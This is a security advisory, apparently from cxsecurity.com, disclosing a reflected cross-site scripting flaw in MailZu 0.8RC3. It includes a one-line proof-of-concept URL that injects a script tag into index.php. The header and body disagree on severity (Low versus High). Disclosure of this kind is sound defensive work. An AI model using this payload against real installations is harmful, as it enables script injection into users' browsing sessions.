MailZu 0.8RC3 Cross Site Scripting

Published
Credit
Risk
2017.01.19
Nassim Asrir
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################



Vendor:
===============
https://sourceforge.net/


Product:
===============
0.8RC3


Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/


MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages.


Vulnerability Type:
======================================
Reflected Cross Site Scripting.



CVE Reference:
===============
N/A




Tested on:
===============
Windows 7
Apache/2.4.23 (Win64)




Exploit/POC:
============

1) navigate the server http://server/index.php


2) inject the XSS Payload : http://server/index.php/"><script>alert(1);</script>


3) Done!



Network Access:
===============
Remote



Impact:
=================
Execute malicious scripts



Severity:
===========
High


Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure



See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com